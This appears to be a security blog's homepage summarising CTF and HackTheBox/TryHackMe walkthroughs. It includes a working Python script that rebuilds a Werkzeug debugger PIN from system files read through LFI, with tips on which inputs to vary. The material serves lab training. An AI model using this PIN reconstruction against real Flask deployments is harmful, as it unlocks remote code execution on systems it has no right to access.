root.sec
Breaking into web applications, hunting vulnerabilities, and building security tools. Documenting the journey along the way.
* Bug Bounty Hunting
* Vulnerability Research
* Security Tooling
Bug Hunting & Ethical Hacking
Breaking web apps, finding vulnerabilities, and documenting the hunt
CTF Writeups
Walkthroughs of HackTheBox and TryHackMe machines with methodology breakdowns.
Bug Bounty
Real-world vulnerability discoveries, hunting techniques, and responsible disclosure stories.
Technical Deep Dives
In-depth analysis of attack vectors, security tools, and exploitation techniques.
Recent Writeups
HackTheBox – DevArea
Detailed exploitation walkthrough for the HackTheBox DevArea machine, covering Apache CXF SSRF (CVE-2022-46364), RCE through Hoverfly's middleware feature, and privilege escalation via a world-writable bash binary.
mKingdom
A detailed walkthrough for the mKingdom machine on TryHackMe. This write-up covers CMS password guessing, achieving initial access via PHP file upload, pivoting through multiple users using discovered credentials and tokens, and finally escalating to root through a writable /etc/hosts file and a malicious cron script.
Plant Photography
A comprehensive deep-dive into the Plant Photography room on TryHackMe. This write-up covers chaining an SSRF into local file reads (LFI), extracting the host data the Werkzeug debugger's PIN is derived from, and reconstructing that PIN to unlock the PIN-protected debugger console for full Remote Code Execution.
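As an added example (not code from the Plant Photography write-up or from Werkzeug itself), the block below reimplements the PIN derivation used by recent Werkzeug releases (SHA-1 based; older releases hashed with MD5) so you can see which leaked values matter. The six inputs are exactly what an SSRF-to-LFI primitive lets you read: the username running the app (`/proc/self/environ` or `/etc/passwd`), the module name and app class name (`flask.app` and `Flask` for a stock Flask app; some versions report `wsgi_app` instead), the absolute path of Flask's `app.py` (visible in the traceback or under site-packages), the MAC address of the serving interface (`/sys/class/net/<iface>/address`, hashed as its decimal integer), and the machine id (`/etc/machine-id`, falling back to `/proc/sys/kernel/random/boot_id`, plus the container id from `/proc/self/cgroup`). Every value in `EXAMPLE_INPUTS` and every file path in the comments is constructed for illustration.

```python
"""Reconstruct a Werkzeug debugger PIN from values recovered via LFI.

Added example: mirrors werkzeug.debug.get_pin_and_cookie_name() for
SHA-1 era releases. All sample inputs are constructed, not real hosts.
"""
import hashlib
from itertools import chain


def mac_to_int(mac: str) -> int:
    """Werkzeug hashes str(uuid.getnode()), i.e. the MAC as a decimal int."""
    return int(mac.replace(":", "").replace("-", ""), 16)


def machine_id_from_files(machine_id_file: bytes, boot_id_file: bytes,
                          cgroup_file: bytes) -> bytes:
    """Rebuild Werkzeug's Linux machine id from already-read file contents.

    Werkzeug takes the first line of /etc/machine-id (or, if that is empty or
    missing, /proc/sys/kernel/random/boot_id) and appends the last path
    component of the first line of /proc/self/cgroup (the Docker container
    id when the app runs in a container; empty on a bare host).
    """
    linux = b""
    for content in (machine_id_file, boot_id_file):
        value = content.splitlines()[0].strip() if content else b""
        if value:
            linux += value
            break
    if cgroup_file:
        linux += cgroup_file.splitlines()[0].strip().rpartition(b"/")[2]
    return linux


def werkzeug_pin(username: str, modname: str, appname: str, app_path: str,
                 mac_int: int, machine_id: bytes) -> tuple[str, str]:
    """Return (pin, cookie_name) the way Werkzeug derives them.

    The 'probably public' bits are hashed first, then the private bits,
    then the salts; the cookie name is taken before 'pinsalt' is mixed in.
    """
    probably_public_bits = [username, modname, appname, app_path]
    private_bits = [str(mac_int), machine_id]
    h = hashlib.sha1()
    for bit in chain(probably_public_bits, private_bits):
        if not bit:
            continue
        if isinstance(bit, str):
            bit = bit.encode("utf-8")
        h.update(bit)
    h.update(b"cookiesalt")
    cookie_name = f"__wzd{h.hexdigest()[:20]}"
    h.update(b"pinsalt")
    num = f"{int(h.hexdigest(), 16):09d}"[:9]
    # Werkzeug groups the 9 digits by the first size that divides evenly,
    # which for 9 digits is always 3-3-3.
    for group_size in (5, 4, 3):
        if len(num) % group_size == 0:
            pin = "-".join(num[x:x + group_size].rjust(group_size, "0")
                           for x in range(0, len(num), group_size))
            break
    else:
        pin = num
    return pin, cookie_name


# Constructed sample: a Flask app running as 'www-data' inside a container.
EXAMPLE_INPUTS = {
    "username": "www-data",
    "modname": "flask.app",
    "appname": "Flask",
    "app_path": "/usr/local/lib/python3.11/site-packages/flask/app.py",
    "mac_int": mac_to_int("02:42:ac:11:00:02"),
    "machine_id": machine_id_from_files(
        b"7d7e19e3b9a84c0f8c4b2d2f0a1b3c4d\n",
        b"",
        b"0::/docker/1b2c3d4e5f60718293a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f1a2b3c4d5e6\n",
    ),
}


def example_pin() -> tuple[str, str]:
    """Derive the PIN and cookie name for the constructed sample host."""
    return werkzeug_pin(**EXAMPLE_INPUTS)


if __name__ == "__main__":
    pin, cookie = example_pin()
    print(f"PIN: {pin}   cookie: {cookie}")
```

The usual failure mode is a wrong `appname` or `app_path` (the debugger reads `app.py` from wherever Flask is installed, not the target's own script) or forgetting the cgroup suffix when the app is containerised; if the PIN is rejected, vary those inputs first. Note that Werkzeug locks the console after too many bad PIN attempts, so brute-forcing inputs against the live target is not an option; compute candidates offline.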
HackTheBox – CCTV
Exploitation walkthrough for HackTheBox CCTV machine, covering ZoneMinder SQL injection, motionEye credential theft, and CVE-2025-60787 RCE for root access.
Featured Projects
HybridRecon X
Docker-based, context-aware recon and pentesting framework that fingerprints targets, adapts scans based on detected technologies and WAFs.
SafeClick
Chrome extension that analyzes websites in real time and assigns them a trust score. Flags phishing sites by combining threat-intelligence database lookups with heuristic checks on the page and URL.
Ready to secure your assets?
Let's collaborate on security research, penetration testing, or just chat about the latest vulnerabilities.